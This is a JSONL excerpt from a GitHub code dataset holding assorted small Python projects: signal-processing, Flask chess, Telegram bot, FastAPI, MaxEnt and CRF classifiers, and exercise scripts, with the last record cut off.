low_freq, high_freq, 0.01, bits_per_symbol, constellation=encode_method)\n known_shifted_rest = np.tile(known_shifted_first,repeat_time-1)\n known_ofdm_data_rest = ofdm.symbols_to_ofdm(known_shifted_rest, dft_length, cp_length=0)\n\n #combine the two parts\n known_ofdm_data = np.concatenate((known_ofdm_data_first,known_ofdm_data_rest))\n return known_ofdm_data,symbols_first\n\ndef transmission_start(fs,low_freq,high_freq,silence_duration):\n start_audio = generate_chirp(1, fs, low=low_freq, high=high_freq, silence_duration=silence_duration, double=False)\n return start_audio\n\ndef transmission_end(fs,low_freq,high_freq,silence_duration):\n chirp = generate_chirp(1, fs, low=low_freq, high=high_freq, silence_duration=0, double=False)\n silence = np.zeros(ceil(fs * silence_duration))\n end_audio = np.append(chirp,silence)\n return end_audio\n\ndef frame_assemble(chirp,known_ofdm,data):\n return np.concatenate((chirp,np.real(known_ofdm),np.real(data),np.real(known_ofdm),chirp))\n\ndef load_known_ofdm(CP_LENGTH = 512,repeat_time = 4):\n known_ofdm_symbol = np.load(\"known_ofdm_symbol.npy\")\n time_domain = np.fft.ifft(known_ofdm_symbol)\n cyclic_prefix = time_domain[-CP_LENGTH:]\n stacked = np.tile(time_domain, repeat_time)\n return np.append(cyclic_prefix,stacked)\n\nif __name__ == \"__main__\": #used for debugging functions, only run if running this file alone\n # known_ofdm = generate_known_ofdm(fs = 48000,dft_length=8192,cp_length=1024,low_freq=1000,high_freq=10000,encode_method='qpsk',repeat_time=5, seed=0)\n # a = known_ofdm[1024:]\n # spb = 1536\n # print(a[200::8192]) #should be the same\n import sounddevice as sd\n import matplotlib.pyplot as plt\n fs = 48000\n start_header = transmission_start(fs,1000,10000,1.2)\n plt.plot(start_header)\n plt.show()\n sd.play(start_header,fs,blocking=True)\n ","repo_name":"yichen-song/IIA_Project_GF3_Group_1","sub_path":"utils/preamble.py","file_name":"preamble.py","file_ext":"py","file_size_in_byte":4383,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"1510906846","text":"#!/usr/bin/env python\nfrom threading import Lock\nfrom flask import Flask, render_template, session, request, \\\n copy_current_request_context,request,jsonify\nfrom flask_socketio import SocketIO, emit, join_room, leave_room, \\\n close_room, rooms, disconnect\nimport sys\nimport json\nfrom Player import Player\nasync_mode = None\n\napp = Flask(__name__, static_folder='public', static_url_path='')\napp.config['SECRET_KEY'] = 'secret!'\nsocketio = SocketIO(app, async_mode=async_mode)\nthread = None\nthread_lock = Lock()\n\n\ndef background_thread():\n \"\"\"Example of how to send server generated events to clients.\"\"\"\n count = 0\n while True:\n socketio.sleep(10)\n count += 1\n socketio.emit('my_response',\n {'data': 'Server generated event', 'count': count},\n namespace='/test')\n\n\n@app.route('/')\ndef index():\n return render_template('menu.html', async_mode=socketio.async_mode)\n\napp.route('/index')\ndef game(name):\n return render_template('index.html')\n\n@app.route('/')\ndef generic(name):\n global PlayerA\n global PlayerB\n if name == \"index\":\n \n global numberofplayer\n if numberofplayer<2:\n numberofplayer+=1\n if PlayerA ==0:\n PlayerA = Player(\"White\",True)\n return render_template(name + '.html',turn='true',name='white')\n elif PlayerB == 0:\n PlayerB = Player(\"Black\",False)\n return render_template(name + '.html',turn='false',name='black')\n else:\n return render_template('cannotplay.html')\n else:\n return render_template(name+'.html')\n\n@socketio.on('join', namespace='/test')\ndef join(message):\n join_room(message['room'])\n session['receive_count'] = session.get('receive_count', 0) + 1 \n emit('my_response',\n {'data': 'In rooms: ' + ', '.join(rooms()),\n 'count': session['receive_count']})\n\n#May use for disconnecting player\n# @socketio.on('leave', namespace='/test')\n# def leave(message):\n# leave_room(message['room'])\n# session['receive_count'] = session.get('receive_count', 0) + 1\n# emit('my_response1',\n# {'data': 'In rooms: ' + ', '.join(rooms()),\n# 'count': session['receive_count']})\n# @socketio.on('disconnect', namespace='/test')\n# def test_disconnect():\n# print('Client disconnected', request.sid)\n\n@socketio.on('my_room_event', namespace='/test')\ndef send_room_message(message):\n global PlayerA\n global PlayerB\n if PlayerA!=0 and PlayerB!=0:\n PlayerA.ismove = not PlayerA.ismove\n PlayerB.ismove = not PlayerB.ismove\n \n session['receive_count'] = session.get('receive_count', 0) + 1\n \n \n emit('my_response1',\n {'data': message['data'], 'count': session['receive_count']},\n room=message['room'])\n\n#USELESS\n#@socketio.on('my_ping', namespace='/test')\n#def ping_pong():\n # emit('my_pong')\n \n#@app.route('/postmethod', methods = ['POST'])\n#def get_post_javascript_data():\n # if request.method == \"POST\":\n # jsdata = json.loads(request.form['javascript_data'])\n # gamepiece = jsdata[0]['piece']\n #current_loc = jsdata[0]['current_loc']\n #new_loc = jsdata[0]['new_loc']\n #return jsonify(gamepiece,current_loc,new_loc)\n\nif __name__ == '__main__':\n PlayerA = 0\n PlayerB = 0\n numberofplayer=0\n socketio.run(app, debug=True)\n","repo_name":"AlexJin366/C.H.E.S.S--Game","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":3430,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"1017778887","text":"import numpy as np\nimport moderngl\nclass Blur:\n def __init__(self, ctx, vs, fs):\n\n self.ctx = ctx\n\n # Init Blur\n self.vbo = self.ctx.buffer(np.float32([-1,-1,1,-1,-1,1,-1,1,1,-1,1,1]))\n self.prog = self.ctx.program(\n vertex_shader = vs,\n fragment_shader = fs)\n self.vao = self.ctx.simple_vertex_array(self.prog, self.vbo, \"a_pos\")\n self.tex = [None for i in range(2)]\n self.fbo = [None for i in range(2)]\n\n def build(self, w, h, d = 3, dt = \"f2\"):\n self.w, self.h, self.d, self.dt = w, h, d, dt\n\n # Build Textures\n for i in range(2):\n if self.tex[i] is not None:\n self.tex[i].release()\n self.tex[i] = self.ctx.texture((w, h), d, dtype=dt)\n\n # Buld FBO's\n for i in range(2):\n if self.fbo[i] is not None:\n self.fbo[i].release()\n self.fbo[i] = self.ctx.framebuffer([self.tex[i]])\n\n self.prog[\"u_res\"].value = self.fbo[0].size\n self.prog[\"u_tex\"].value = 0\n\n def blur(self, tex, out, n=0, s=2):\n self.prog[\"u_size\"].value = s\n\n self.blit(tex, self.fbo[0])\n for i in range(n):\n self.blur_once()\n self.blit(self.tex[0], out)\n\n def blur_once(self):\n self.tex[0].use(0)\n self.prog[\"u_mode\"].value = 1\n self.fbo[1].use()\n self.vao.render()\n self.tex[1].use(0)\n self.prog[\"u_mode\"].value = 2\n self.fbo[0].use()\n self.vao.render()\n\n def blit(self, tex, out):\n tex.use(0)\n out.use()\n self.prog[\"u_mode\"].value = 0\n self.vao.render()\n\n def tex_fbo(self):\n tex = self.ctx.texture((self.w, self.h), self.d, dtype=self.dt)\n fbo = self.ctx.framebuffer([tex])\n return (tex, fbo)\n","repo_name":"onetaste108/rdapp_web","sub_path":"src/main/python/blur.py","file_name":"blur.py","file_ext":"py","file_size_in_byte":1817,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"39795320555","text":"A = [0, -1, 2, -3, 1]\n\nsum = -2\n\nsize = len(A)\n\nfor i in range(0,size):\n for j in range(i+1, size):\n if A[i] + A[j] == sum:\n print(f\"Pair with a given sum is ({A[i]},{A[j]})\")\n break","repo_name":"nishantpanwar18/Python","sub_path":"Learning/find_pair_with_given_sum.py","file_name":"find_pair_with_given_sum.py","file_ext":"py","file_size_in_byte":210,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"171265325","text":"import telebot\nfrom our_token import token\nfrom constants import *\nfrom extensions import *\n\nTOKEN = token\n# TOKEN = _token\n\nbot = telebot.TeleBot(TOKEN)\n\n# обработчик команд\n@bot.message_handler(commands=['start'])\ndef handle_start_command(message):\n text = f'Приветствую, {message.chat.first_name}. Я - бот. Моя задача получить от тебя команду (/start, /help, /values) ' \\\n f'или 3 параметра для исчисления конвертации\\n' \\\n f'\\nКонвертация происходит по следующим правиламвы мне 3 параметра через пробел в виде ' \\\n f'<исходная валюта> <валюта в которую надо перевести> <количество у.е.>, а я вам результат выдаю'\n bot.reply_to(message, text)\\\n\n\n@bot.message_handler(commands=['help'])\ndef handle_help_command(message):\n text = f'{message.chat.first_name}, конвертация валюты происходит по следующим правилам: ' \\\n f'вы мне 3 параметра через пробел в виде <исходная валюта> <валюта в которую надо перевести> <количество у.е.>, ' \\\n f'а я вам результат выдаю'\n bot.reply_to(message, text)\n\n\n# обработчик команды /values\n@bot.message_handler(commands=['values'])\ndef handle_values_command(message):\n text = 'Доступные валюты:'\n for item in currency.keys():\n text += f'\\n\\t\\t\\t{item}'\n bot.reply_to(message, text)\n\n\n# здесь обрабатывается входящее сообщение состоящие из исходной валюты\n@bot.message_handler(content_types=[\"text\"])\ndef handle_request(message: telebot.types.Message):\n try:\n values = message.text.split(' ')\n if len(values) > 3:\n bot.reply_to(message, 'Параметров должно быть 3, а ты сколько прислал? БОЛЬШЕ!!')\n elif len(values) < 3:\n bot.reply_to(message, 'Такая простая просьба и то слабоват =( Я просил 3 аргумента, никак не меньше!')\n else:\n base, quote, amount = values\n\n total_quote = Exchange.get_price(base, quote, amount)\n\n for key, value in currency.items():\n if base in value:\n base = key\n if quote in value:\n quote = key\n\n text = f'Первод из {base} в {quote} состоялся:\\n{amount} {base} = {total_quote} {quote}'\n\n bot.send_message(message.chat.id, text)\n except Exception as e:\n if type(e) == APIException:\n bot.reply_to(message, f'Ошибка пользователя. Лузер\\n\\n{e}')\n pass\n bot.reply_to(message, f'Что-то пошло не так.\\n\\n{e}')\n\nbot.polling(none_stop=True)","repo_name":"volshebstvuyu/module18_TelegramBot","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3085,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"28446194332","text":"filein = open(\"day10/input.txt\", \"r\")\n\nlines = filein.readlines()\n\nvalues = [1] # each index is a cycle\n\ndef processInput():\n for line in lines:\n line = line.split()\n \n if line[0] == \"addx\":\n values.append(int(values[-1]))\n values.append(int(values[-1]) + int(line[1]))\n \n elif line[0] == \"noop\":\n values.append(int(values[-1]))\n \n return values\n\ndef calculateSum(values):\n total = 0\n for i in range(20, 221, 40):\n total += values[i - 1] * i\n \n return total\n\ndef printCRT(values):\n sprite = 0\n for i in range(len(values)): \n if i % 40 == 39:\n end = \"\\n\"\n elif i % 40 == 0:\n end = \"\"\n sprite = 0\n else:\n end = \"\"\n sprite += 1\n \n if abs(values[i] - sprite) <= 1:\n print(\"#\", end=end)\n else:\n print(\".\", end=end)\n\nvalues = processInput()\n\nprint(\"part1:\", calculateSum(values))\nprint(\"part2:\")\nprintCRT(values)\n \n\n \n \n \n \n \n \n","repo_name":"DerpTaterTot/adventofcode2022","sub_path":"day10/solution.py","file_name":"solution.py","file_ext":"py","file_size_in_byte":1076,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"28570526064","text":"#Dana jest N-elementowa tablica T, zawierająca liczby. Proszę napisać funkcję, która zwróci indeks\n#największej liczby, która jest iloczynem wszystkich liczb pierwszych leżących w tablicy na indeksach\n#mniejszych od niej lub None, jeżeli taka liczba nie istnieje.\n\nimport math\n\ndef is_prime(num):\n if num <= 1:\n return False\n if num == 2 or num == 3:\n return True\n if num % 2 == 0 or num % 3 == 0:\n return False\n for i in range(5, math.isqrt(num) + 1, 6):\n if num % i == 0 or num % (i + 2) == 0:\n return False\n return True\n\ndef solve(t):\n biggest = 0\n for i in range(len(t)):\n product = 1\n max_ind = t[i] - 1\n while max_ind > 0:\n if is_prime(t[max_ind]):\n product *= t[max_ind]\n max_ind -= 1\n if product == t[i] and t[i] > biggest:\n biggest = t[i]\n biggest_ind = i\n if biggest_ind == 0:\n return None\n else: return biggest_ind\n\nprint(solve([1, 3, 1, 3, 4, 2, 6]))","repo_name":"klark142/Introduction_to_Computer_Science","sub_path":"Kolokwia/2021_1b.py","file_name":"2021_1b.py","file_ext":"py","file_size_in_byte":1033,"program_lang":"python","lang":"pl","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"38193775105","text":"from fastapi import APIRouter, Depends\nfrom fastapi.responses import JSONResponse\nfrom typing import List, Annotated\nfrom middlewares.JWTBearer import jwt_bearer\nfrom dataModels.paquete import PaqueteBase\nfrom dataModels.consolidado import ConsolidadoBase\nfrom src.database.db_package import precarga_paquetes, get_consolidado, get_paquete, invoice_search\nfrom src.database.db_auth import roles_match\nfrom src.Roles import Roles\n\npackage_router = APIRouter()\n\n\n@package_router.post(\"/precarga\", tags=[\"precarga\"])\ndef upload_precarga(paquetes: List[PaqueteBase], consolidado: ConsolidadoBase,\n user_id: Annotated[int, Depends(jwt_bearer)]):\n if not roles_match(user_id, Roles.EDITOR) and not roles_match(user_id, Roles.ADMIN):\n return JSONResponse(content={\"message\": \"Usuario no autorizado para PRECARGA\"}, status_code=403)\n try:\n\n precarga_paquetes(paquetes, consolidado, user_id)\n\n except ValueError as e:\n # Dinstincion entre errores esperados\n error_message = str(e)\n if 'integridad' in error_message:\n status_code = 409\n else:\n status_code = 400\n return JSONResponse(content={\"message\": error_message}, status_code=status_code)\n\n except Exception as e:\n # Manejo de otros errores\n return JSONResponse(content={\"message\": str(e)}, status_code=500)\n\n return JSONResponse(content={\"message\": \"Precarga exitosa\"}, status_code=201)\n\n\n@package_router.get(\"/get/consolidado/{consolidado_id}\", tags=[\"precarga\"])\ndef get_consolidado_endpoint(consolidado_id: int, user_id: Annotated[int, Depends(jwt_bearer)]):\n consolidado = get_consolidado(consolidado_id)\n return JSONResponse(content=consolidado, status_code=200)\n\n\n@package_router.get(\"/get/paquete/{paquete_id}\", tags=[\"precarga\"])\ndef get_paquete_endpoint(paquete_id: int, user_id: Annotated[int, Depends(jwt_bearer)]):\n try:\n paquete = get_paquete(paquete_id)\n return JSONResponse(content=paquete, status_code=200)\n\n except Exception as e:\n return JSONResponse(content={\"message\": str(e)}, status_code=500)\n\n\n@package_router.get(\"/search/invoice/{invoice}\", tags=[\"precarga\"])\ndef get_invoice_endpoint(invoice: str, user_id: Annotated[int, Depends(jwt_bearer)]):\n paquetes = invoice_search(invoice)\n return JSONResponse(content=paquetes, status_code=200)\n","repo_name":"gusanitor8/SLIAnicamBackend","sub_path":"routers/package_router.py","file_name":"package_router.py","file_ext":"py","file_size_in_byte":2367,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"11905707131","text":"import cv2\r\nimport numpy as np\r\n\r\ndef main():\r\n filename = \"images/lena.jpg\"\r\n img = cv2.imread(filename, cv2.IMREAD_GRAYSCALE)\r\n cv2.imshow('image', img)\r\n\r\n Hist = np.zeros((256))\r\n ysize = img.shape[0]\r\n xsize = img.shape[1]\r\n\r\n for y in range(ysize):\r\n for x in range(xsize):\r\n Hist[img.item(y, x)] = Hist[img.item(y, x)] + 1\r\n\r\n normHist = np.empty((256))\r\n sum = 0.0\r\n factor = 255.0 / (ysize * xsize)\r\n\r\n for i in range(256):\r\n sum += Hist[i]\r\n normHist[i] = round(sum * factor)\r\n\r\n for y in range(ysize):\r\n for x in range(xsize):\r\n img.itemset((y, x), normHist[img.item(y, x)])\r\n\r\n cv2.imshow('result', img)\r\n cv2.waitKey(0)\r\n cv2.destroyAllWindows()\r\n\r\nmain()","repo_name":"ryanjung94/OpenCV_Lecture","sub_path":"histogram_equalization.py","file_name":"histogram_equalization.py","file_ext":"py","file_size_in_byte":763,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"71674282705","text":"from collections import defaultdict\nimport math\n#https://vimsky.com/article/714.html\n#https://vimsky.com/article/776.html\n\nclass MaxEnt(object):\n\n def __init__(self):\n self.feats = defaultdict(int)\n self.trainset = []\n self.labels = set()\n\n def load_data(self, file):\n import pdb;pdb.set_trace()\n for line in open(file):\n fields = line.strip().split()\n\n # at least two columns\n if len(fields) < 2:\n continue\n # the first column is label\n label = fields[0]\n self.labels.add(label)\n\n for f in set(fields[1:]):\n # (label,f) tuple is feature\n self.feats[(label, f)] += 1\n self.trainset.append(fields)\n \n print(self.trainset)\n\n def _initparams(self):\n\n self.size = len(self.trainset)#15\n # M param for GIS training algorithm\n self.M = max([len(record) - 1 for record in self.trainset])#3\n self.ep_ = [0.0] * len(self.feats)#len:12个特征函数\n\n for i, f in enumerate(self.feats):\n # calculate feature expectation on empirical distribution,经验分布\n # E_p*(f_i)\n self.ep_[i] = float(self.feats[f]) / float(self.size)\n # each feature function correspond to id\n self.feats[f] = i\n\n # init weight for each feature\n self.w = [0.0] * len(self.feats)\n\n self.lastw = self.w\n\n def probwgt(self, features, label):\n wgt = 0.0\n #计算sum_i(w_i*f_i(x,y))\n for f in features:\n if (label, f) in self.feats:\n wgt += self.w[self.feats[(label, f)]]\n \n #exp(sum_i(w_i*f_i(x,y)))\n return math.exp(wgt)\n\n \"\"\"\n calculate feature expectation on model distribution,计算关于模型分布的期望\n \"\"\"\n def Ep(self):\n ep = [0.0] * len(self.feats)\n for record in self.trainset:\n features = record[1:]\n # calculate p(y|x)\n prob = self.calprob(features)#[(0.5, 'Outdoor'), (0.5, 'Indoor')]\n\n for f in features:\n for w, l in prob:\n # only focus on features from training data.\n if (l, f) in self.feats:\n # get feature id\n idx = self.feats[(l, f)]\n # sum(1/N * f(y,x)*p(y|x)), p(x) = 1/N\n ep[idx] += w * (1.0 / self.size)\n\n #E_P(f_i)\n return ep\n\n def _convergence(self, lastw, w):\n\n for w1, w2 in zip(lastw, w):\n if abs(w1 - w2) >= 0.01:\n return False\n return True\n\n def train(self, max_iter=1000):\n import pdb;pdb.set_trace()\n self._initparams()\n for i in range(max_iter):\n print('iter %d ...' % (i + 1))\n # calculate feature expectation on model distribution\n self.ep = self.Ep()\n self.lastw = self.w[:]\n for i, w in enumerate(self.w):\n #GIS算法更新公式\n delta = 1.0 / self.M * math.log(self.ep_[i] / self.ep[i])\n # update w\n self.w[i] += delta\n\n print(self.w)\n # test if the algorithm is convergence\n if self._convergence(self.lastw, self.w):\n break\n\n def calprob(self, features):\n\n wgts = [(self.probwgt(features, l), l) for l in self.labels]#[(1.0, 'Outdoor'), (1.0, 'Indoor')]\n Z = sum([w for w, l in wgts])#计算Z_w=sum_y{sum_i[w_i*f_i(x,y)]}\n prob = [(w / Z, l) for w, l in wgts]#p(y|x)\n\n return prob\n\n def predict(self, input):\n\n features = input.strip().split()\n prob = self.calprob(features)\n prob.sort(reverse=True)\n\n return prob\n\n\nmodel = MaxEnt()\n'''\nOutdoor Sunny Happy\nOutdoor Sunny Happy Dry\nOutdoor Sunny Happy Humid\nOutdoor Sunny Sad Dry\nOutdoor Sunny Sad Humid\nOutdoor Cloudy Happy Humid\nOutdoor Cloudy Happy Humid\nOutdoor Cloudy Sad Humid\nOutdoor Cloudy Sad Humid\nIndoor Rainy Happy Humid\nIndoor Rainy Happy Dry\nIndoor Rainy Sad Dry\nIndoor Rainy Sad Humid\nIndoor Cloudy Sad Humid\nIndoor Cloudy Sad Humid\n'''\n#label={outdoor,indoor}\n#words={Sunny,Happy,Dry,Humid,Sad,Cloudy,Rainy}\n#context:15条\n\nmodel.load_data('Input/gameLocation.dat')\nmodel.train()\n","repo_name":"buyizhiyou/lihang_Tutorial","sub_path":"CH06/maxent_simple.py","file_name":"maxent_simple.py","file_ext":"py","file_size_in_byte":4346,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"30414782143","text":"import joblib\nfrom sklearn_crfsuite import CRF\nfrom sklearn.metrics import classification_report\nfrom sklearn.preprocessing import MultiLabelBinarizer\nfrom sklearn.metrics import f1_score, hamming_loss, jaccard_score, accuracy_score, log_loss\nfrom sklearn.preprocessing import MultiLabelBinarizer\n\nfrom prepare_model_input import prepare_crf_input\n\n# Retrieve training data and labels and testing data and labels\nX_train, y_train, X_test, y_test = prepare_crf_input()\n\n# Flatten the nested lists\ny_test_flat = [label for sublist in y_test for label in sublist]\n\nmlb = MultiLabelBinarizer()\ny_test_binary = mlb.fit_transform(y_test_flat)\n\n\ndef build_crf_model():\n crf_model = CRF(\n algorithm='lbfgs',\n c1=0.1,\n c2=0.1,\n max_iterations=100,\n all_possible_transitions=True,\n )\n return crf_model\n\n\nif __name__ == \"__main__\":\n model = build_crf_model()\n\n model.fit(X_train, y_train)\n joblib.dump(model, \"saved_models/crf_model.joblib\")\n\n # Make predictions on the test set\n y_pred = model.predict(X_test)\n\n y_pred_flat = [label for sublist in y_pred for label in sublist]\n y_pred_binary = mlb.transform(y_pred_flat)\n\n # print(classification_report(y_test_binary, y_pred_binary, target_names=mlb.classes_))\n\n # Print classification report\n # print(classification_report(y_test, y_pred))\n\n # Convert predictions and true labels to binary format\n # y_test_binary = mlb.transform(y_test)\n # y_pred_binary = mlb.transform(y_pred)\n\n accuracy_crf = accuracy_score(y_test_binary, y_pred_binary)\n\n loss_crf = log_loss(y_test_binary, y_pred_binary)\n\n print(f'CRF Accuracy: {accuracy_crf:.4f}')\n print(f'CRF Loss: {loss_crf:.4f}')\n\n # Compute the micro-averaged F1 score\n micro_f1 = f1_score(y_test_binary, y_pred_binary, average='micro')\n\n # Compute Hamming Loss\n hamming_loss_value = hamming_loss(y_test_binary, y_pred_binary)\n\n # Compute Jaccard Similarity Score\n jaccard_score_value = jaccard_score(y_test_binary, y_pred_binary, average='samples')\n\n print(\"Micro-Averaged F1 Score:\", micro_f1)\n print(\"Hamming Loss:\", hamming_loss_value)\n print(\"Jaccard Similarity Score:\", jaccard_score_value)\n","repo_name":"Chizaram-Igolo/resume-reader","sub_path":"models/classifiers/crf.py","file_name":"crf.py","file_ext":"py","file_size_in_byte":2205,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"35753953182","text":"import sqlite3\r\nimport argparse\r\nimport csv\r\n\r\n'''\r\ndef open_with_db(csv_out_name, do_print):\r\n \"\"\"Gets the url and file names using a sql query and writing it to CSV\r\n\r\n Parameters\r\n ----------\r\n csv_out_name : str\r\n The CSV file to write the urls and file names.\r\n do_print : bool\r\n Whether or not to print the results to stdout.\r\n\r\n \"\"\"\r\n\r\n cursor.execute(\"select urln.urln, urla.url, inda.archiveID, inda.urlID, inda.date, inda.succeed, indn.succeed;\")\r\n \"from current_index indn, archive_index inda, current_urls urln, archive_urls urla \" +\r\n \"where indn.archiveID = inda.archiveID \" +\r\n \"and indn.archiveID = urln.archiveID \" +\r\n \"and indn.archiveID = urla.archiveID \" +\r\n \"and indn.urlID = inda.urlID \" +\r\n \"and indn.urlID = urln.urlID \" +\r\n \"and indn.urlID = urla.urlID \" +\r\n \"and (indn.succeed = 200 or inda.succeed = 200) \" +\r\n \"and (indn.succeed = 302 or inda.succeed = 302)\" +\r\n \";\")\r\n\r\n fetchall = cursor.fetchall()\r\n\r\n with open(csv_out_name, 'w+') as csv_file_out:\r\n csv_writer = csv.writer(csv_file_out, delimiter=',', quoting=csv.QUOTE_ALL)\r\n csv_writer.writerow([\"current_url\", \"archive_url\", \"current_file_name\", \"archive_file_name\"])\r\n \r\n for row in fetchall:\r\n [current_url, archive_url, archive_id, url_id, date] = row\r\n current_filename = \"{0}.{1}.png\".format(archive_id, url_id)\r\n archive_filename = \"{0}.{1}.{2}.png\".format(archive_id, url_id, date)\r\n csv_writer.writerow([current_url, archive_url, current_filename, archive_filename])\r\n\r\n if do_print:\r\n print(\"{0}|{1}|{2}|{3}\".format(current_url, archive_url, current_filename, archive_filename))\r\n\r\n connection.close()\r\n'''\r\n\r\ndef open_with_csv(curr_csv_name, arch_csv_name, csv_out_name, do_print):\r\n \"\"\"Parses both index files line by line and writes the urls and file names to the output file.\r\n\r\n Parameters\r\n ----------\r\n curr_csv_name : str\r\n The CSV file with the current screenshot index.\r\n arch_csv_name : str\r\n The CSV file with the archive screenshots index.\r\n csv_out_name : str\r\n The CSV file to write the urls and file names.\r\n do_print : bool\r\n Whether or not to print the results to stdout.\r\n\r\n \"\"\"\r\n\r\n with open(curr_csv_name, \"r\") as curr_csv_file:\r\n curr_csv_reader = csv.reader(curr_csv_file)\r\n with open(arch_csv_name, \"r\") as arch_csv_file:\r\n arch_csv_reader = csv.reader(arch_csv_file)\r\n\r\n with open(csv_out_name, \"w+\") as csv_file_out:\r\n csv_writer = csv.writer(csv_file_out, delimiter=',', quoting=csv.QUOTE_ALL)\r\n csv_writer.writerow([\"current_url\", \"archive_url\", \"current_file_name\", \"archive_file_name\"])\r\n\r\n next(curr_csv_reader) # skip header\r\n next(arch_csv_reader)\r\n crow = next(curr_csv_reader) # a single row in the current index file\r\n arow = next(arch_csv_reader)\r\n\r\n # goes through both files and gets info row by row\r\n try:\r\n while True: # how to check EOF in csv?\r\n\r\n [carchive_id, curl_id, curl] = crow[:3]\r\n cscreenshot_status = crow[-1]\r\n [aarchive_id, aurl_id, adate, aurl] = arow[:4]\r\n ascreenshot_status = arow[-1]\r\n\r\n curl_id = int(curl_id)\r\n aurl_id = int(aurl_id)\r\n\r\n if curl_id > aurl_id or ascreenshot_status != \"Screenshot successful\":\r\n arow = next(arch_csv_reader)\r\n elif curl_id < aurl_id or cscreenshot_status != \"Screenshot successful\":\r\n crow = next(curr_csv_reader)\r\n else:\r\n current_filename = \"{0}.{1}.png\".format(carchive_id, curl_id)\r\n archive_filename = \"{0}.{1}.{2}.png\".format(aarchive_id, aurl_id, adate)\r\n csv_writer.writerow([curl, aurl, current_filename, archive_filename])\r\n\r\n if do_print:\r\n print(\"{0}, {1}, {2}, {3}\".format(curl, aurl, current_filename, archive_filename))\r\n\r\n arow = next(arch_csv_reader)\r\n\r\n except StopIteration:\r\n pass\r\n\r\n\r\ndef connect_sql(path):\r\n \"\"\"Connects the DB file. \"\"\"\r\n\r\n global connection, cursor\r\n\r\n connection = sqlite3.connect(path)\r\n cursor = connection.cursor()\r\n connection.commit()\r\n\r\n\r\ndef parse_args():\r\n \"\"\"Parses the command line arguments\r\n\r\n Returns\r\n -------\r\n use_csv : bool\r\n Whether or not the input is a CSV.\r\n use_db : bool\r\n Whether or not the input is a DB.\r\n curr_csv_name : str\r\n The CSV file with the current screenshot index.\r\n arch_csv_name : str\r\n The CSV file with the archive screenshots index.\r\n csv_out_name : str\r\n The CSV file to write the urls and file names.\r\n do_print : bool\r\n Whether or not to print the results to stdout.\r\n\r\n \"\"\"\r\n\r\n parser = argparse.ArgumentParser()\r\n\r\n # initializing every line switch\r\n parser.add_argument(\"--currcsv\", type=str, help=\"The CSV file with the current screenshots index\")\r\n parser.add_argument(\"--archcsv\", type=str, help=\"The CSV file with the archive screenshots index\")\r\n parser.add_argument(\"--db\", type=str, help=\"Input DB file with urls\")\r\n parser.add_argument(\"--out\", type=str, help=\"The CSV file to write the urls and file names\")\r\n parser.add_argument(\"--print\", action='store_true',\r\n help=\"(optional) Include to print urls and file names to stdout, default doesn't print\")\r\n\r\n args = parser.parse_args()\r\n\r\n # some parameters checking\r\n if args.currcsv is None and args.archcsv is None and args.db is None:\r\n print(\"Must provide input file\\n\")\r\n exit()\r\n if args.db is not None and not (args.currcsv is None and args.archcsv is None):\r\n print(\"Must only use only one type of input file\\n\")\r\n exit()\r\n if args.db is None and (args.currcsv is None or args.archcsv is None):\r\n print(\"Must provide both current and archive index CSV files\\n\")\r\n exit()\r\n if args.out is None:\r\n print(\"Must specify output file\\n\")\r\n exit()\r\n\r\n if args.currcsv is not None and args.archcsv is not None:\r\n use_csv = True\r\n curr_csv_name = args.currcsv\r\n arch_csv_name = args.archcsv\r\n else:\r\n use_csv = False\r\n curr_csv_name = None;\r\n arch_csv_name = None;\r\n\r\n if args.db is not None:\r\n use_db = True\r\n connect_sql(args.db)\r\n else:\r\n use_db = False\r\n\r\n csv_out_name = args.out\r\n do_print = args.print\r\n\r\n return use_csv, use_db, curr_csv_name, arch_csv_name, do_print, csv_out_name\r\n\r\n\r\ndef main():\r\n use_csv, use_db, curr_csv_name, arch_csv_name, do_print, csv_out_name = parse_args()\r\n if use_csv:\r\n open_with_csv(curr_csv_name, arch_csv_name, csv_out_name, do_print)\r\n if use_db:\r\n open_with_db(csv_out_name, do_print)\r\n\r\n\r\nmain()\r\n","repo_name":"reyesayala/wa_screenshot_compare","sub_path":"get_file_names_withDB.py","file_name":"get_file_names_withDB.py","file_ext":"py","file_size_in_byte":7417,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"48"} +{"seq_id":"71270003985","text":"\ndef solution(stationA, stationB, stationC, origin, dest):\n\trouteMap = {}\n\n\tfor i in stationA:\n\t\tif i not in routeMap:\n\t\t\trouteMap[i] = \"A\"\n\n\tfor i in stationB:\n\t\tif i not in routeMap:\n\t\t\trouteMap[i] = \"B\"\n\n\tfor i in stationC:\n\t\tif i not in routeMap:\n\t\t\trouteMap[i] = \"C\"\n\n\tif origin not in routeMap or dest not in routeMap:\n\t\treturn \"\"\n\n\tprint(routeMap[origin], routeMap[dest])\n\n\t# import pdb\n\t# pdb.set_trace()\n\n\tif (routeMap[origin] == \"A\" and routeMap[dest] == \"B\") or (routeMap[origin] == \"B\" and routeMap[dest] == \"A\"):\n\t\treturn \"AB\"\n\n\tif (routeMap[origin] == \"A\" and routeMap[dest] == \"A\") or (routeMap[origin] == \"B\" and routeMap[dest] == \"B\"):\n\t\treturn \"AB\"\n\n\tif (routeMap[origin] == \"B\" and routeMap[dest] == \"C\") or (routeMap[origin] == \"C\" and routeMap[dest] == \"B\"):\n\t\treturn \"BC\"\n\n\tif (routeMap[origin] == \"C\" and routeMap[dest] == 